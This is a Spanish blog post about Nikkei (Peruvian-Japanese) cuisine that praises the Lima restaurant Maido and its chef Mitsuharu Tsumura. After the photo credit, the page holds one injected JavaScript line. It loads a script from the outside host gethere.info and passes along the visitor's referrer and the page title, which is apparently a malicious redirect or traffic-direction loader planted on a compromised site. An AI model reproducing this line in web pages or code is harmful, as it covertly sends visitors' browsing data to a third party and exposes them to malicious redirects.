Hablando de cocina nikkei

13/11/2015

Maido

Para hablar de cocina nikkei, lo mejor es viajar hasta el otro lado del Océano y aterrizar en Lima, Perú. Una vez allí, irnos hasta la calle San Martín número 399 donde atisbaremos el restaurante Maido. Entraremos y nos sentaremos en la mesa que previamente habíamos reservado. Entonces, es cuando nos dejaremos llevar por la experiencia de degustar auténtica cocina nikkei.

Pero desgranemos eso de cocina nikkei. ¡Que levante la mano el que nunca haya oído hablar del asunto! Conocer otras gastronomías es fundamental para no perdernos de algunos placeres de la vida :). La nikkei es una de esas cocinas fusión tan en auge en lo últimos tiempos. Mitad peruana, mitad nipona, no suele defraudar ni al más exigente paladar.

Nos cuentan que el restaurante Maido domina el asunto fusión de una manera pasmosa. Cuando nos enteramos que su chef, Mitsuharu Tsumura, es 50% peruano, 50% japonés, lo entendemos todo. Trabaja con ahínco y tesón y eleva el gusto por sus platillos hasta el séptimo cielo. De hecho, Maido figura en la lista de los 50 mejores restaurantes del mundo, ocupando el número 44 de dicha lista.

El éxito de la cocina nikkei en Perú es rotundo. Probablemente la inmensa comunidad nipona en Perú -formada por unas 100.000 personas- tenga buena parte de culpa. Seas peruano, seas japonés, o seas de donde seas, si tienes la oportunidad de ir a Maido, no te pierdas sus pescados. Trabajados con sutileza, limón y ají amarillo, son una auténtica delicia.

¡Que aproveche!

Foto | fabulousfabs

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;

ARTÍCULOS RELACIONADOS
COMPARTE ESTE ARTÍCULO